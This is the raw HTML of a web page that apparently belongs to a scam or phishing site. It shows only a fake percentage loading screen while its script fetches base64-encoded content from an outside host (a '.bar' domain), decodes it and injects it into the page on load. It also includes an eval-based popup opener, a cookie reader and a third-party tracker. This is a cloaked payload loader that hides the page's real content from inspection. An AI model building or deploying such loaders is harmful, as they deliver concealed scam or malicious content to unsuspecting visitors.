<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="maximum-scale=1.0, minimum-scale=1.0, user-scalable=0, initial-scale=1.0, width=device-width" />
<meta name="referrer" content="always">
<link rel="shortcut icon" href="/fav.ico">
<title>...</title>
<link rel="icon" href="data:image/ico;base64,aWNv">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="robots" content="noindex,nofollow">
<link rel="stylesheet" href="https://61556b691639e.oss-ap-southeast-1.aliyuncs.com/ehctsf/TqLDFra/IlFdFskI/yOklclDX.css">
<link rel="stylesheet" href="https://61556b691639e.oss-ap-southeast-1.aliyuncs.com/ehctsf/TqLDFra/IlFdFskI/JscsJH.css">
<style>

    
    
    
        .TOqjbA {
            position: relative;
            width: 2.5em;
            height: 2.5em;
            transform: rotate(165deg);
        }
        
        .TOqjbA:before, .TOqjbA:after {
            content: "";
            position: absolute;
            top: 50%;
            left: 50%;
            display: block;
            width: 0.5em;
            height: 0.5em;
            border-radius: 0.25em;
            transform: translate(-50%, -50%);
        }
        
        .TOqjbA:before {
            animation: before 2s infinite;
        }

        .TOqjbA:after {
            animation: after 2s infinite;
        }
        
        @keyframes before {
            0% {
                width: 0.5em;
                box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75);
            }
            35% {
                width: 2.5em;
                box-shadow: 0 -0.5em rgba(225, 20, 98, 0.75), 0 0.5em rgba(111, 202, 220, 0.75);
            }
            70% {
                width: 0.5em;
                box-shadow: -1em -0.5em rgba(225, 20, 98, 0.75), 1em 0.5em rgba(111, 202, 220, 0.75);
            }
            100% {
                box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75);
            }
        }
        
        @keyframes after {
            0% {
                height: 0.5em;
                box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75);
            }
            35% {
                height: 2.5em;
                box-shadow: 0.5em 0 rgba(61, 184, 143, 0.75), -0.5em 0 rgba(233, 169, 32, 0.75);
            }
            70% {
                height: 0.5em;
                box-shadow: 0.5em -1em rgba(61, 184, 143, 0.75), -0.5em 1em rgba(233, 169, 32, 0.75);
            }
            100% {
                box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75);
            }
        }
        
        /**
         * Attempt to center the whole thing!
         */
        html, body {
            height: 100%;
        }
        
        .TOqjbA {
            position: absolute;
            top: calc(40% - 1.25em);
            left: calc(50% - 1.25em);
        }
        
    </style>
</head>
<body translate="no" style="margin: 0">
<div id="loadMain" style="z-index: 100">
<div style="position:fixed;top:0;bottom: 0;left: 0;right: 0;z-index: inherit; background-color: #fff">
<div class="TOqjbA"></div>
<div style="position: absolute;top:42%; bottom: 0;left: 0;right: 0;margin: auto;text-align: center "><h4 style="font-size: 16px;margin: 20px 0;color: #222f3e;font-weight: 500;line-height:1"> Loading... (<span id="loadPer">1</span>%)</h4></div>
</div>
</div>
<div id="rVoxF"></div>
<script src="https://61556b691639e.oss-ap-southeast-1.aliyuncs.com/ehctsf/TqLDFra/IlFdFskI/wTOQeh.js"></script>
<script src="https://61556b691639e.oss-ap-southeast-1.aliyuncs.com/ehctsf/TqLDFra/IlFdFskI/LpQprbABC.js"></script>
<script src="https://61556b691639e.oss-ap-southeast-1.aliyuncs.com/ehctsf/TqLDFra/IlFdFskI/HFWKzGn.js"></script>
<script>
function LPhNXJisQoUuMf(name) {
	var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
	if (arr != null) return unescape(arr[2]);
	return null
}
function ETMtUFCV(url,windowName,width,height){
	var x = parseInt(screen.width / 2.0) - (width / 2.0); 
	var y = parseInt(screen.height / 2.0) - (height / 2.0);
	var isMSIE= (navigator.appName == "Microsoft Internet Explorer");
	if (isMSIE) {
		var p = "resizable=1,location=no,scrollbars=no,width=";
		p = p+width;
		p = p+",height=";
		p = p+height;
		p = p+",left=";
		p = p+x;
		p = p+",top=";
		p = p+y;
		retval = window.open(url, windowName, p);
	} else {
		var win = window.open(url, "ZyiisPopup", "top=" + y + ",left=" + x + ",scrollbars=" + scrollbars + ",dialog=yes,modal=yes,width=" + width + ",height=" + height + ",resizable=no" );
		eval("try { win.resizeTo(width, height); } catch(e) { }");
		win.focus();
	}
}

 
function NhSKxpTe() {
	return !!document.getElementById('wixMobileViewport');
}
var linkurl = 'https://m.gzdfnu.bar/php_code_995.php?v'+Date.now();
function PfvgIgCt(a) {
        return decodeURIComponent(atob(a).split('').map(function(c) {
            return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
        }).join(''));
    }
    document.addEventListener("DOMContentLoaded", function(event) {
        loadPer = $('#loadPer');
        prev = 1;
        timer = function () {
            if (prev < 100) {
                loadPer.text(++prev);
                setTimeout(timer, 100);
            }
        };
        setTimeout(timer,100)
        var request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                $('#rVoxF').html(PfvgIgCt(this.responseText))
            }
        };
        request.open('GET',linkurl,true);
        request.send();
    });
    
    
    (function(){
	var SxnOSkJrUVfDhd = function(){
		var w = document.documentElement ? document.documentElement.clientWidth : document.body.clientWidth
			,r = 1255
			,b = document.body
			,classname = b.className;
		if(w < r){
			//当窗体的宽度小于1255的时候执行相应的操作
		}else{
			//当窗体的宽度大于1255的时候执行相应的操作
		}
	}
	if(window.addEventListener){
		window.addEventListener('resize', function(){ fn(); });
	}else if(window.attachEvent){
		window.attachEvent('onresize', function(){ fn(); });
	}
	SxnOSkJrUVfDhd();
})();
</script>
<script>
!function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text/javascript",n.setAttribute("charset","UTF-8"),n.async=!0,n.src=c,n.id="LA_COLLECT",i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:"JSd1EWuztEnhGm2n",ck:"JSd1EWuztEnhGm2n"});
</script>
</html>
